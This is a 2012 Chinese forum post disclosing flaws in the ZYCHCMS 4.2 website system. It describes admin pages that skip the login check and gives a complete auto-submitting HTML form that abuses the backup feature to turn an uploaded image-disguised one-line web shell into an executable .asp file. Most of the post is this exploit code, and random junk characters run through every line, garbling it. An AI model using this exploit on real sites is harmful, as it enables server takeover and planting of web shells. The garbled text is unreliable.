/ K) v6 x8 F$ \. c+ b
1 }. B2 M+ Z/ p i7 B9 ]/ E- d9 T. e5 ~' g- x
0 ~2 l5 j) B. q/ ^2 o影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)2 W) I9 M: M9 @8 I v( n4 L$ Y
①SQL注射漏洞
- C% A" H5 F+ C& ^, U& u' u 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
6 s" x, o/ r; @, K$ o6 u& \. t; ? B 漏洞原因:未过滤! Y: O1 z e$ l" w' S0 ]; q
漏洞代码:: w3 }- K, h* H. x2 n
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。! S0 p" O! u: e, R/ Y
修复方法:在文件开头加入代码
& q5 G6 H6 C0 v1 N( ]
" `8 t9 i& ^" f# z' ]5 q! B
6 p( n. k6 ]8 x②后台拿WBSHELL& @) p8 H F2 w
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
$ G# J, h2 g8 G1 L5 P6 D 这里在网上找了一个,改了下,将就着用。
}- g2 N1 a1 \2 p2 n. U# S 以下是代码本地提交代码8 q9 H0 z4 @& R( V( x' l
9 p" R# u5 F. ^. M' i0 I* a' v9 [! W; ]- |( x3 D
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>& s" Z6 g+ V7 W) A3 i* M! X1 j) N7 J
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>$ `7 _- G/ O& M* H* H
<tr>+ F+ d( s& F( i, a+ L. y
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
1 B2 s5 K( ?6 C$ ~. n+ P* J0 _ </tr>
7 D, v( L! S7 T% N( @ <tr>* w' w2 l: o( T1 U& y3 C
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>5 w. Z! M& r* s$ l6 _
</span>
. F: Q- u4 d% v1 ^6 d5 f/ C* w <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >0 Q9 S4 y: N; T
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >0 k" P, s/ h$ g! J0 ?: x
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
( S0 ~- Q. b3 ]' a' e6 h <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
, v" A, \! _% i2 C0 X) D' X% E f <div align=”left”>2 K! l, _& s1 i) T6 h. l" J
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />- [; z; F2 |; E
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
% E$ M6 v1 e+ a% _ <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />. R/ U& g2 l1 @
</div></td>
6 y C" i' ]) C4 v </tr>( }, U. p l P0 Q6 t
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
9 E! ~9 r% D3 n/ I) V: E <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
# q3 U9 o5 l# H) V( f2 h& M <td class=”td”><div align=”left”>9 _* E2 a& j9 ^7 _) ?
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />0 B- u" l _7 @! e8 }9 C1 K
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
; I7 M: M+ h* w! M& U </tr>: c6 B5 }- B! Y8 A( ~
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
' p0 E- F, Q7 w3 c) W5 A e) H <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>- F" G8 N% F# s
<td class=”td”><div align=”left”>
' H. F1 i, X. |2 Q7 ]4 k <input type=”submit” value=”确定备份” class=”btn”
1 Q( n3 j5 t4 Y. W. K </div></td>. k: ?9 ~3 O# S- n) g
</tr>
" r& Z0 O# @7 t5 ^. `; r* M1 l( |5 B </table></td></tr></form>
! p; v8 s4 ?& F0 q0 ?+ @; W </table>
/ D: v* \: {/ W </td>
2 i+ D7 ?1 ]- S6 V. f </tr>6 @ D' a+ u7 j. H: v! ]) c) {; c
</table>/ c b+ O& a( b+ n; w* b! o+ A
<script>! M' H; |6 Y c$ E
document.all.add.submit();
, H1 y* E. n5 R </script>7 }( h3 z! G; A1 t R
) s# {* i8 c! `/ X
& @+ ^- P& U' j0 k4 W
, r% b! B& n9 w! T' L
. V9 d+ \% F0 ]' }
5 S5 w& `4 b) R9 F4 ]0 O# W# m
9 i' l: k, P( Q" s. {, E3 m e( H% o. z/ \' {$ V+ F( F* K
i- \: {- _! |8 w3 S
6 R, J9 T4 O" I; c* F9 p" ]
$ w# e* D/ d0 f( ?7 ?$ e, z |
发表于 2012-9-10 21:09:51
收藏
支持
反对